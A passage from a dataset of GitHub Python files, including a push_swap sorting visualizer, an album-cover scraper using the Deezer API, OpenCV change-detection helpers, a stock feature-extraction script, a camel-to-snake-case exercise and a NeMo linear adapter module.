)\n","repo_name":"Echoesver/aiida-core","sub_path":"tests/tools/importexport/migration/test_v04_to_v05.py","file_name":"test_v04_to_v05.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"8097396322","text":"import pygame as pg\nfrom term_printer import ColorRGB, cprint\nimport random\nimport subprocess\nimport sys\nfrom config import PUSH_SWAP, CHECKER, MIN, MAX, NB_SIZE, DELAY_TIME\nfrom operations import *\n\n#initial position\nx = 40\ny = 40\nSCREEN_WIDTH = 950\nSCREEN_HEIGHT = 680\n\n#30 + 365 + 30 + 365 + 30 + 100 + 30\nGRAPH_WIDTH = 365\nMARGIN = 30\n\n#SCREEN setting ((width, height)) & caption\nSCREEN= pg.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npg.display.set_caption(\"itkimura push_swap visualizer\")\n\n#random number\ndef random_ints_nodup(MIN, MAX, NB_SIZE):\n NB = []\n while len(NB) < NB_SIZE:\n N = random.randint(MIN, MAX)\n if not N in NB:\n NB.append(N)\n return NB\n\nrandom = random_ints_nodup(MIN, MAX, NB_SIZE)\n\n#width and height of each GRAPH\n\n#color\nr = 248;\nb = 7;\n\ndef init_width(NB):\n newlist = sorted(NB)\n for i in range(len(NB)):\n for j in range(len(newlist)):\n if NB[i] == newlist[j]:\n NB[i] = j + 1\n return (NB)\n\ndef print_stack(stack_a, stack_b, ops, ops_nb):\n g = 248;\n height = (SCREEN_HEIGHT - 150) / NB_SIZE;\n width = GRAPH_WIDTH / NB_SIZE;\n limit = len(stack_a)\n if (limit > 500):\n height = 1\n limit = 500\n for i in range(limit):\n #draw a rectangle, (surface, color, position & dimention, x, y, width, height\n g = 248 - (8 * (stack_a[i] / (NB_SIZE / 31)))\n pg.draw.rect(SCREEN, (r, g, b), (30, 120 + (int(height) * i), width * stack_a[i], height));\n limit = len(stack_b)\n if (limit > 500):\n height = 1\n limit = 500\n for i in range(limit):\n #draw a rectangle, (surface, color, position & dimention, x, y, width, height\n g = 248 - (8 * (stack_b[i] / (NB_SIZE / 31)))\n pg.draw.rect(SCREEN, (r, g, b), (60 + GRAPH_WIDTH, 120 + (int(height) * i), width * stack_b[i], height));\n args_len = len(ops)\n if args_len > 50:\n args_len = 50;\n for i in range(args_len):\n font = pg.font.SysFont('Futura', 10);\n ops_nb += 1\n ops_str = ' [ ' + str(ops_nb) + ' ]'\n text = font.render(ops_str, True, (255,255,255));\n text_rect = text.get_rect(center=(MARGIN * 3 
+ GRAPH_WIDTH * 2, (120 + (10 * i))))\n        SCREEN.blit(text, text_rect)\n        text = font.render(str(ops[i]), True, (255,255,255));\n        text_rect = text.get_rect(center=(MARGIN * 3 + GRAPH_WIDTH * 2 + 30, (120 + (10 * i))))\n        SCREEN.blit(text, text_rect)\n\ndef text():\n    #title\n    font = pg.font.SysFont('Futura', 20);\n    text = font.render(\"[Press Space to start] itkimura push_swap visualizer\", True, (255,255,255));\n    text_rect = text.get_rect(center=(SCREEN_WIDTH/2, 30))\n    SCREEN.blit(text, text_rect)\n\n    #stack_a\n    font = pg.font.SysFont('Futura', 20);\n    a_text = font.render(\"stack_a\", True, (255,255,255));\n    SCREEN.blit(a_text, [MARGIN, 60])\n\n    #stack_b\n    b_text = font.render(\"stack_b\", True, (255,255,255));\n    SCREEN.blit(b_text, [GRAPH_WIDTH + MARGIN * 2, 60])\n\n    #ops\n    b_text = font.render(\"ops\", True, (255,255,255));\n    SCREEN.blit(b_text, [SCREEN_WIDTH - 130, 60])\n\ndef push_swap():\n    random_str = [str(n) for n in random]\n    args = \" \".join(random_str)\n    data = subprocess.Popen([PUSH_SWAP, args], stdout=subprocess.PIPE)\n    output = data.stdout.read()\n    data.stdout.close()\n    output = list(output.decode(\"utf-8\").split(\"\\n\"))\n    output.pop()\n    return (output)\n\ndef main():\n    pg.init()\n    stack_a = init_width(random)\n    stack_b = []\n    output = push_swap()\n    output_nb = 0\n    execute = False\n    while True:\n        pg.time.delay(DELAY_TIME)\n        keys = pg.key.get_pressed()\n        print_stack(stack_a, stack_b, output, output_nb)\n        pg.display.update()\n        if keys[pg.K_SPACE]:\n            execute = True\n        if execute == True:\n            if len(output) != 0:\n                apply_ops(str(output[0]), stack_a, stack_b)\n                output_nb += 1\n                del output[0]\n        for event in pg.event.get():\n            if event.type == pg.QUIT:\n                pg.quit()\n                sys.exit()\n        #fill background color\n        SCREEN.fill((0, 0, 0))\n        text()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"itkimura/push_swap","sub_path":"bonus/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"31931525438","text":"import requests\r\nimport json\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport csv\r\nimport os\r\nimport time\r\n\r\n\r\n\r\n\r\n# Get few band names from wikipedia\r\ndef get_prog_metal_bands():\r\n\r\n\tbands_l = []\r\n\turl = 'https://en.wikipedia.org/wiki/List_of_progressive_metal_artists'\r\n\tsource = urllib.request.urlopen(url)\r\n\thtml = source.read()\r\n\tsource.close()\r\n\tsoup = BeautifulSoup(html, 'lxml')\r\n\tsoup1 = soup.body.find_all('div')\r\n\tsoup1 = soup1[2].find_all('div')[7]\r\n\tsoup1 = soup1.find_all('ul')\r\n\tfor i in range(1, len(soup1)-2):\r\n\t\tsoup2 = soup1[i].find_all('li')\r\n\t\tfor j in range(0, len(soup2)):\r\n\t\t\ttry:\r\n\t\t\t\tsoup3 = soup2[j].a.text\r\n\t\t\t\tbands_l.append(soup3)\r\n\t\t\texcept:\r\n\t\t\t\tprint('error')\r\n\r\n\tprint(bands_l)\r\n\tprint(len(bands_l))\t\r\n\t\r\n# Get few band names from wikipedia\r\ndef get_post_rock_bands():\r\n\t\t\r\n\tbands_l = []\r\n\turl = 'https://en.wikipedia.org/wiki/List_of_post-rock_bands'\r\n\tsource = urllib.request.urlopen(url)\r\n\thtml = source.read()\r\n\tsource.close()\r\n\tsoup = BeautifulSoup(html, 'lxml')\r\n\tsoup1 = soup.body.find_all('div')\r\n\tsoup1 = soup1[2].find_all('div')[7]\r\n\tprint(soup1)\r\n\r\n\r\n# Get names of metal, progressive and alternative bands and save it\r\ndef get_bands_shop():\r\n\tdata = {'prog':34, 'metal':126, 'alternative':89}\r\n\tbands_l = []\r\n\tfor dat in data:\r\n\t\tfor page in range(1, 
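A minimal sketch of the pipe pattern used by push_swap() in the visualizer.py record above, rewritten with the higher-level subprocess.run API; the "./push_swap" path stands in for the PUSH_SWAP constant the record imports from its config module:

```python
import subprocess

def run_push_swap(numbers):
    args = " ".join(str(n) for n in numbers)
    # capture_output + text replaces the manual stdout.read()/decode() dance
    proc = subprocess.run(["./push_swap", args], capture_output=True, text=True)
    # splitlines() drops the trailing empty entry that split("\n") + pop() removed
    return proc.stdout.splitlines()
```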
data[dat]):\r\n\t\t\turl = f'https://www.recordshopx.com/{dat}/cd/?p={page}&o=a'\r\n\t\t\tsource = urllib.request.urlopen(url)\r\n\t\t\thtml = source.read()\r\n\t\t\tsource.close()\r\n\t\t\tsoup = BeautifulSoup(html, 'lxml')\r\n\t\t\tsoup1 = soup.body.find_all('div', id=\"content\")\r\n\t\t\tsoup1 = soup1[0].find_all('div', class_='col-xs-12 col-md-8')\r\n\t\t\tsoup1 = soup1[0].find_all('ul', class_='list-unstyled list-products')[0].find_all('li')\r\n\t\t\tfor i in range(0, len(soup1) - 1):\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsoup2 = soup1[i].find_all('div', class_='col-xs-8 col-sm-10 details')[0]\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(page, i)\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsoup2 = soup2.h3.text.split('\\n')[2]\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tband = soup2.split(',')\r\n\t\t\t\t\t\tband = band[0] + ' ' + band[1]\r\n\t\t\t\t\t\tbands_l.append(band)\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tbands_l.append(band[0])\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint('skipping')\r\n\t\t\tprint('sleeping 5 sec')\r\n\t\t\ttime.sleep(5)\r\n\r\n\tbands_l = list(set(bands_l))\r\n\twith open('bands.csv', 'w') as f:\r\n\t\tfor i in bands_l:\r\n\t\t\ttry:\r\n\t\t\t\tf.write(f'{i}\\n')\r\n\t\t\texcept:\r\n\t\t\t\tprint('cannot write')\r\n\r\n\r\n# Get album covers from the Deezer API \r\ndef get_covers():\r\n\r\n\twith open('bands.csv', 'r') as f:\r\n\t\treader = csv.reader(f)\r\n\t\t\r\n\t\tfor i in reader:\r\n\r\n\t\t\ttry:\r\n\t\t\t\tresponse2 = requests.get(f'https://api.deezer.com/search/album?q=artist:\"{i[0]}\"/album')\r\n\t\t\t\tr2 = response2.json()\r\n\t\r\n\t\t\t\tfor j in r2['data']:\r\n\r\n\t\t\t\t\ttitle = j['title']\r\n\t\t\t\t\tpic = j['cover_big']\r\n\t\t\t\t\tif not os.path.exists(f'albums/{i[0]}_{title}.jpg'):\r\n\t\t\t\t\t\turllib.request.urlretrieve(str(pic), f'albums/{i[0]}_{title}.jpg')\r\n\t\t\texcept:\r\n\t\t\t\tprint(f'Error getting {i}')\r\n\t\t\tprint('sleeping')\r\n\t\t\ttime.sleep(5)\r\n\t\t\t\t\r\nget_covers()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Brda92/AlbumCovers-deezer","sub_path":"album_covers_deezer.py","file_name":"album_covers_deezer.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"3188011882","text":"import cv2\nimport tkinter as tk\nimport numpy as np\n\nroot = tk.Tk()\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\ndx = int(screen_width / 2)\ndy = int(screen_height / 2)\nlabel_bar_height = 70\n\nfile_output = \"output.txt\"\n\n\ndef show(wait=False, **kwargs):\n\n    x = 0\n    y = 0\n    for key in kwargs:\n        label = key\n        img = kwargs[key]\n        cv2.namedWindow(label, cv2.WINDOW_NORMAL)\n        cv2.imshow(label, img)\n        cv2.resizeWindow(label, dx, dy - label_bar_height)\n        cv2.moveWindow(label, x, y)\n        screen_end = int(x / (screen_width - dx)) > 0\n        x = x + dx if not screen_end else 0\n        y += dy if screen_end else 0\n    if wait:\n        cv2.waitKey(0)\n        cv2.destroyAllWindows()\n\n\ndef updating_background(c_mask, frame, bck, alpha):\n    bck_upd = (alpha*frame + (1-alpha)*bck)*c_mask + bck*(1-c_mask)\n    return bck_upd\n\n\ndef denoise(img, n):\n    img = cv2.GaussianBlur(img, (n, n), 1)\n    img = cv2.medianBlur(img, n)\n    return img\n\n\ndef morphology(mask):\n\n    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 15))\n    img_morphology = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n    img_morphology = cv2.morphologyEx(img_morphology, cv2.MORPH_OPEN, kernel)\n    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n 
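A hedged sketch of a single lookup from the album_covers_deezer.py record above, using only the endpoint and the 'title'/'cover_big' response fields the record itself relies on; the existence check and the save must point at the same file name:

```python
import os
import requests

def fetch_covers(artist):
    resp = requests.get("https://api.deezer.com/search/album",
                        params={"q": f'artist:"{artist}"'})
    for album in resp.json().get("data", []):
        path = f"albums/{artist}_{album['title']}.jpg"
        if not os.path.exists(path):  # same name for the check and the save
            with open(path, "wb") as fh:
                fh.write(requests.get(album["cover_big"]).content)
```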
img_morphology = cv2.dilate(img_morphology, kernel, iterations=1)\n\n return img_morphology\n\n\ndef define_contour(n_frame, contours, img_contour):\n\n out_file = open(file_output, \"a\")\n size = len(contours)\n\n object_detected = 0\n\n for cnt in range(size):\n area = round(cv2.contourArea(contours[cnt]))\n perimeter = round(cv2.arcLength(contours[cnt], True))\n classification = \" \"\n\n if 400 < perimeter < 800:\n cv2.drawContours(img_contour, contours[cnt], -1, (0, 128, 0), 2)\n classification += \"person\"\n object_detected += 1\n out_file.write(\"Object Id: \" + str(object_detected) + \" | Area: \" + str(area) + \" | Perimeter: \" +\n str(perimeter) + \" | Classification:\" + classification + \"\\n\")\n elif 120 <= perimeter < 130 and area < 680:\n cv2.drawContours(img_contour, contours[cnt], -1, (255, 0, 255), 2)\n classification += \"other\"\n object_detected += 1\n out_file.write(\"Object Id: \" + str(object_detected) + \" | Area: \" + str(area) + \" | Perimeter: \" +\n str(perimeter) + \" | Classification:\" + classification + \"\\n\")\n elif 84 <= perimeter < 90:\n cv2.drawContours(img_contour, contours[cnt], -1, (255, 0, 0), 2)\n classification += \"other\"\n object_detected += 1\n out_file.write(\"Object Id: \" + str(object_detected) + \" | Area: \" + str(area) + \" | Perimeter: \" +\n str(perimeter) + \" | Classification:\" + classification + \"\\n\")\n\n out_file.write(\"Frame index: \" + str(n_frame) + \" | Object Detected: \" + str(object_detected) + \"\\n\")\n out_file.write(\"--------------------------------------------------------------\\n\")\n\n out_file.close()\n return img_contour\n\n\ndef detect_false_object(contours, gray, background, img_contour):\n\n sb_x_gray = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, 3))\n sb_x_background = np.absolute(cv2.Sobel(background, cv2.CV_64F, 1, 0, 3))\n\n sb_y_gray = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, 3))\n sb_y_background = np.absolute(cv2.Sobel(background, cv2.CV_64F, 0, 1, 3))\n\n for cnt in range(len(contours)):\n area = round(cv2.contourArea(contours[cnt]))\n perimeter = round(cv2.arcLength(contours[cnt], True))\n if 80 < perimeter < 130 and area < 680:\n size = len(contours[cnt])\n for j in range(size):\n y = contours[cnt][j][0][0]\n x = contours[cnt][j][0][1]\n if j == 0:\n\n sum_sb_x_gray = sb_x_gray[x,y].astype(np.int)\n sum_sb_x_back = sb_x_background[x, y].astype(np.int)\n\n sum_sb_y_gray = sb_y_gray[x, y].astype(np.int)\n sum_sb_y_back = sb_y_background[x, y].astype(np.int)\n\n else:\n\n sum_sb_x_gray += sb_x_gray[x, y].astype(np.int)\n sum_sb_x_back += sb_x_background[x, y].astype(np.int)\n\n sum_sb_y_gray += sb_y_gray[x, y].astype(np.int)\n sum_sb_y_back += sb_y_background[x, y].astype(np.int)\n\n mean_x_gray = round(sum_sb_x_gray/size)\n mean_y_gray = round(sum_sb_y_gray / size)\n\n mean_x_back = round(sum_sb_x_back / size)\n mean_y_back = round(sum_sb_y_back / size)\n\n if mean_x_gray < mean_x_back and mean_y_gray < mean_y_back:\n for j in range(len(contours[cnt])):\n y = contours[cnt][j][0][0]\n x = contours[cnt][j][0][1]\n cv2.circle(img_contour, (y, x), 1, (0, 0, 255), -1)\n","repo_name":"bombolo94/ChangeDetection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30915254066","text":"\"\"\"\nThis script looks for json data in the data directory to create training and testing set based on the 12 features\n\"\"\"\nimport os\nimport sys\nfrom datetime 
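updating_background() in the utils.py record above is a selective exponential moving average: pixels where c_mask is 1 blend toward the new frame, the rest keep the old background. A tiny numpy check of the formula:

```python
import numpy as np

bck = np.zeros((2, 2))
frame = np.full((2, 2), 10.0)
c_mask = np.array([[1.0, 0.0], [1.0, 0.0]])
alpha = 0.5
bck_upd = (alpha * frame + (1 - alpha) * bck) * c_mask + bck * (1 - c_mask)
print(bck_upd)  # [[5. 0.] [5. 0.]] -- masked-in pixels blend, the rest keep bck
```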
import datetime, timezone\nimport argparse\nimport numpy as np\nimport json\nimport pandas as pd\nfrom feature_extraction_helpers import *\nfrom utils.timezone_utils import *\n\nDATA_PATH = \"data/\"\nFILE_EXT = \".json\"\n\ndef filter_data_by_time(sorted_data, filter_by_year):\n\tremoval_indices = []\n\tfor i in range(len(sorted_data)):\n\t\tts = int(sorted_data[i]['t']) / 1000\n\t\tutc_datetime = datetime.utcfromtimestamp(ts)\n\t\tnyc_datetime = utc_datetime.replace(tzinfo=timezone.utc).astimezone(Eastern)\n\n\t\t# 0930-1130 and 1300-1500\n\t\t# year < filter_by_year remove\n\t\tif(nyc_datetime.year < filter_by_year):\n\t\t\tremoval_indices.append(i)\n\t\telif(nyc_datetime.hour >= 9 and nyc_datetime.hour < 12):\n\t\t\tif(nyc_datetime.hour == 9 and nyc_datetime.minute <= 30):\n\t\t\t\tremoval_indices.append(i)\n\t\t\telif(nyc_datetime.hour == 11 and nyc_datetime.minute > 30):\n\t\t\t\tremoval_indices.append(i)\n\t\telif(nyc_datetime.hour >= 13 and nyc_datetime.hour <= 15):\n\t\t\tif(nyc_datetime.minute > 0):\n\t\t\t\tremoval_indices.append(i)\n\t\telse:\n\t\t\tremoval_indices.append(i)\n\t# Remove\n\tfor index in sorted(removal_indices, reverse=True):\n\t\tdel sorted_data[index]\n\treturn sorted_data\n\n\ndef extract_timestamp(item):\n\ttry:\n\t\treturn int(item['t'])\n\texcept KeyError:\n\t\treturn 0\n\ndef extract_features(file_path, period_1, period_2, filter_by_time, filter_by_year):\n\twith open(file_path) as data_file:\n\t\tdata = json.load(data_file)\n\t\tresult_json_list = data['results']\n\t\tresult_dataframe = pd.DataFrame.from_records(result_json_list)\n\n\t\t# Remove All zeroes rows\n\t\tall_zeros_rows = result_dataframe[(result_dataframe['o'] ==0) | (result_dataframe['c'] == 0) | (result_dataframe['h'] == 0) | ((result_dataframe['l'] == 0))].index\n\t\tresult_dataframe.drop(all_zeros_rows, inplace = True)\n\t\tresult_json_list = json.loads(result_dataframe.to_json(orient = 'records'))\n\n\t\t# Sort according to timestamp\n\t\tresult_json_list.sort(key = extract_timestamp)\n\n\t\t# filter out data based on time\n\t\tif(filter_by_time):\n\t\t\tresult_json_list = filter_data_by_time(result_json_list, filter_by_year)\n\n\t\t# Compute technical indicators\n\t\troc_list = ROC(result_json_list, period_1)\n\t\tatr_list = ATR(result_json_list, period_1)\n\t\tma_list = MA(result_json_list, period_1)\n\t\tema_list = EMA(result_json_list, period_1)\n\t\tmacd_list = MACD(result_json_list, period_1, period_2)\n\t\tsr_list = SR(result_json_list, period_1)\n\n\t\t# Extract market variables\n\t\to_list, c_list, h_list, l_list, v_list, t_list= Market_Variables(result_json_list)\n\n\t\t# Data size check\n\t\tassert len(roc_list) == len(atr_list) == len(ma_list) == len(ema_list) == len(macd_list) == len(o_list) == len(c_list) == len(h_list) == len(l_list) == len(v_list) == len(t_list)\n\n\t\tfeatures_array = np.array([roc_list, atr_list, ma_list, ema_list, macd_list, o_list, c_list, h_list, l_list, v_list, sr_list, t_list]).T\n\t\treturn features_array\n\n\ndef normalize(train_set, test_set):\n\t# Ignore the last two column which are timestamp and sharpe ratio\n\tnorm_train_set = train_set.copy()\n\tnorm_test_set = test_set.copy()\n\tmean_vec = np.mean(train_set[:, : -3], axis = 0)\n\tmean_mat = np.repeat(np.expand_dims(mean_vec, axis = 0), norm_train_set.shape[0], axis = 0)\n\tsd_vec = np.std(train_set[:, : -3], axis = 0)\n\tsd_mat = np.repeat(np.expand_dims(sd_vec, axis = 0), norm_train_set.shape[0], axis = 0)\n\tnorm_train_set[:, : -3] = (train_set[:, : -3] - mean_mat) / 
sd_mat\n\tnorm_test_set[:, : -3] = (test_set[:, : -3] - mean_mat[:norm_test_set.shape[0]]) / sd_mat[:norm_test_set.shape[0]]\n\treturn norm_train_set, norm_test_set\n\ndef create_dataset(file_path, split_ratio, period_1, period_2, filter_by_time, filter_by_year):\n\tif(file_path is None):\n\t\t# Go through the entire directory\n\t\tfor file in os.listdir(DATA_PATH):\n\t\t\tif(file.endswith(FILE_EXT)):\n\t\t\t\tstock_name = file.split('_')[1]\n\t\t\t\tfile_path = os.path.join(DATA_PATH, file)\n\t\t\t\t# Extract features\n\t\t\t\tfeatures_array = extract_features(file_path, period_1, period_2, filter_by_time, filter_by_year)\n\n\t\t\t\t# Train/Test split\n\t\t\t\ttrain_size = int(features_array.shape[0] * split_ratio)\n\t\t\t\ttest_size = features_array.shape[0] - train_size\n\t\t\t\ttrain_set = features_array[: train_size]\n\t\t\t\ttest_set = features_array[train_size :]\n\t\t\t\tassert (train_set.shape[0] + test_set.shape[0]) == features_array.shape[0]\n\n\t\t\t\t# Normalize dataset\n\t\t\t\tnorm_train_set, norm_test_set = normalize(train_set, test_set)\n\t\t\t\tassert norm_train_set.shape == train_set.shape\n\t\t\t\tassert norm_test_set.shape == test_set.shape\n\n\t\t\t\t# Save file\n\t\t\t\tif(filter_by_time):\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized_filtered_fyear\" + str(filter_by_year) + \".npy\", norm_train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw_filtered_fyear\" + str(filter_by_year) + \".npy\", train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized_filtered_fyear\" + str(filter_by_year) + \".npy\", norm_test_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw_filtered_fyear\" + str(filter_by_year) + \".npy\", test_set)\n\t\t\t\telse:\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized.npy\", norm_train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw.npy\", train_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized.npy\", norm_test_set)\n\t\t\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw.npy\", test_set)\n\telse:\n\t\t# Process individual file\n\t\t# Assume the file is in the DATA_PATH directory\n\t\tstock_name = file_path.split('/')[1].split('_')[1]\n\t\t# Extract features\n\t\tfeatures_array = extract_features(file_path, period_1, period_2, filter_by_time, filter_by_year)\n\n\t\t# Train/Test split\n\t\ttrain_size = int(features_array.shape[0] * split_ratio)\n\t\ttest_size = features_array.shape[0] - train_size\n\t\ttrain_set = features_array[: train_size]\n\t\ttest_set = features_array[train_size :]\n\t\tassert (train_set.shape[0] + test_set.shape[0]) == features_array.shape[0]\n\n\t\t# Normalize dataset\n\t\tnorm_train_set, norm_test_set = normalize(train_set, test_set)\n\t\tassert norm_train_set.shape == train_set.shape\n\t\tassert norm_test_set.shape == test_set.shape\n\t\tprint(\"train set size: \" + str(norm_train_set.shape[0]))\n\t\tprint(\"test set size: \" + str(norm_test_set.shape[0]))\n\n\t\t# Save file\n\t\tif(filter_by_time):\n\t\t\tnp.save(DATA_PATH + 
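The key contract of normalize() in the create_dataset.py record above is that mean and standard deviation are fit on the training block only and then reused for the test block. A minimal check of that behaviour:

```python
import numpy as np

train = np.array([[1.0], [3.0]])
test = np.array([[2.0]])
mu, sd = train.mean(axis=0), train.std(axis=0)  # fit on train only
print((train - mu) / sd)  # [[-1.] [ 1.]]
print((test - mu) / sd)   # [[0.]] -- the test block reuses train statistics
```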
stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized_filtered_fyear\" + str(filter_by_year) + \".npy\", norm_train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw_filtered_fyear\" + str(filter_by_year) + \".npy\", train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized_filtered_fyear\" + str(filter_by_year) + \".npy\", norm_test_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw_filtered_fyear\" + str(filter_by_year) + \".npy\", test_set)\n\t\telse:\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_normalized.npy\", norm_train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_train_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) + \"_raw.npy\", train_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_normalized.npy\", norm_test_set)\n\t\t\tnp.save(DATA_PATH + stock_name + \"_test_data\" + \"_p1\" + str(period_1) + \"_p2\" + str(period_2) +\"_raw.npy\", test_set)\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\t# File path to specific file, if this is not provided, the script will process everything in the data directory with the right format\n\tparser.add_argument(\"--file_path\", type = str, default = None)\n\t# Train test split ratio\n\tparser.add_argument(\"--split_ratio\", type = float, default = 0.8)\n\t# Averaging period\n\tparser.add_argument(\"--period_1\", type = int, default = 10)\n\t# For MACD\n\tparser.add_argument(\"--period_2\", type = int, default = 25)\n\t# Whether to filter data by time according to paper - only keep 0930-1130 and 1300-1500\n\tparser.add_argument('--filter_by_time', default=False, help='whether to filter data by time')\n\t# Filter any data before this year\n\tparser.add_argument('--filter_by_year', type = int, default=2000, help='The oldest year to include')\n\targs = parser.parse_args()\n\n\tcreate_dataset(args.file_path, args.split_ratio, args.period_1, args.period_2, args.filter_by_time, args.filter_by_year)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"richielo/RL_Trade","sub_path":"workspace/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":8906,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"10928250103","text":"\"\"\"\nPython, by contrast, recommends snake case, whereby words are instead separated by underscores\n(_), with all letters in lowercase. For instance, those same variables would be called name, \nfirst_name, and preferred_first_name, respectively, in Python.\n\nIn a file called camel.py, implement a program that prompts the user for the name of a variable\nin camel case and outputs the corresponding name in snake case. 
Assume that the user’s input\nwill indeed be in camel case.\n\"\"\"\ncamel_case = input(\"camel case: \")\nfor c in camel_case:\n if c.islower():\n print (c, end=\"\")\n else:\n low = str(c).lower()\n print(f\"_{low}\", end=\"\")\nprint()\n","repo_name":"osankar/python_learn","sub_path":"assignments/set3/camel.py","file_name":"camel.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41441412427","text":"from dataclasses import dataclass\n\nfrom torch import nn as nn\n\nfrom nemo.collections.common.parts.utils import activation_registry\nfrom nemo.core.classes.mixins import adapter_mixin_strategies\n\n\nclass LinearAdapter(nn.Module):\n \"\"\"\n Simple Linear Feedforward Adapter module with LayerNorm and singe hidden layer with activation function.\n Note: The adapter explicitly initializes its final layer with all zeros in order to avoid affecting the\n original model when all adapters are disabled.\n\n Args:\n in_features: Input dimension of the module. Note that for adapters, input_dim == output_dim.\n dim: Hidden dimension of the feed forward network.\n activation: Str name for an activation function.\n norm_position: Str, can be `pre` or `post`. Defaults to `post`. Determines whether the normalization\n will occur in the first layer or the last layer. Certain architectures may prefer one over the other.\n \"\"\"\n\n def __init__(self, in_features, dim, activation: str = 'swish', norm_position=\"post\"):\n super().__init__()\n\n activation = activation_registry[activation]()\n # If the activation can be executed in place, do so.\n if hasattr(activation, 'inplace'):\n activation.inplace = True\n\n assert norm_position in ['pre', 'post']\n self.norm_position = norm_position\n\n if norm_position == 'pre':\n self.module = nn.Sequential(\n nn.LayerNorm(in_features),\n nn.Linear(in_features, dim, bias=False),\n activation,\n nn.Linear(dim, in_features, bias=False),\n )\n\n elif norm_position == 'post':\n self.module = nn.Sequential(\n nn.Linear(in_features, dim, bias=False),\n activation,\n nn.Linear(dim, in_features, bias=False),\n nn.LayerNorm(in_features),\n )\n\n # set default adapter strategy\n self.adapter_strategy = adapter_mixin_strategies.ResidualAddAdapterStrategy()\n\n # reset parameters\n self.reset_parameters()\n\n def reset_parameters(self):\n # Final layer initializations must be 0\n if self.norm_position == 'pre':\n self.module[-1].weight.data *= 0\n\n elif self.norm_position == 'post':\n self.module[-1].weight.data *= 0\n self.module[-1].bias.data *= 0\n\n def forward(self, x):\n return self.module(x)\n\n\n@dataclass\nclass LinearAdapterConfig:\n in_features: int\n dim: int\n activation: str = 'swish'\n norm_position: str = 'post'\n _target_: str = \"{0}.{1}\".format(LinearAdapter.__module__, LinearAdapter.__name__)\n","repo_name":"QDaria/NeMo","sub_path":"nemo/collections/common/parts/adapter_modules.py","file_name":"adapter_modules.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"42374648748","text":"from utils import *\nfrom collections import Counter\nprint = logger.info\n\ndef solve(D, I, S, streets, car_paths):\n \"\"\"\n disclaimer: I dont understand the motivation of the signal time of each street\n create frequency list of streets based on cars first paths. 
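The character loop in the camel.py record above works; for comparison, the same conversion as a regex one-liner (a sketch, not part of the original exercise):

```python
import re

def camel_to_snake(name: str) -> str:
    # insert "_" before each interior capital, then lowercase everything
    return re.sub(r"(?<!^)(?=[A-Z])", "_", name).lower()
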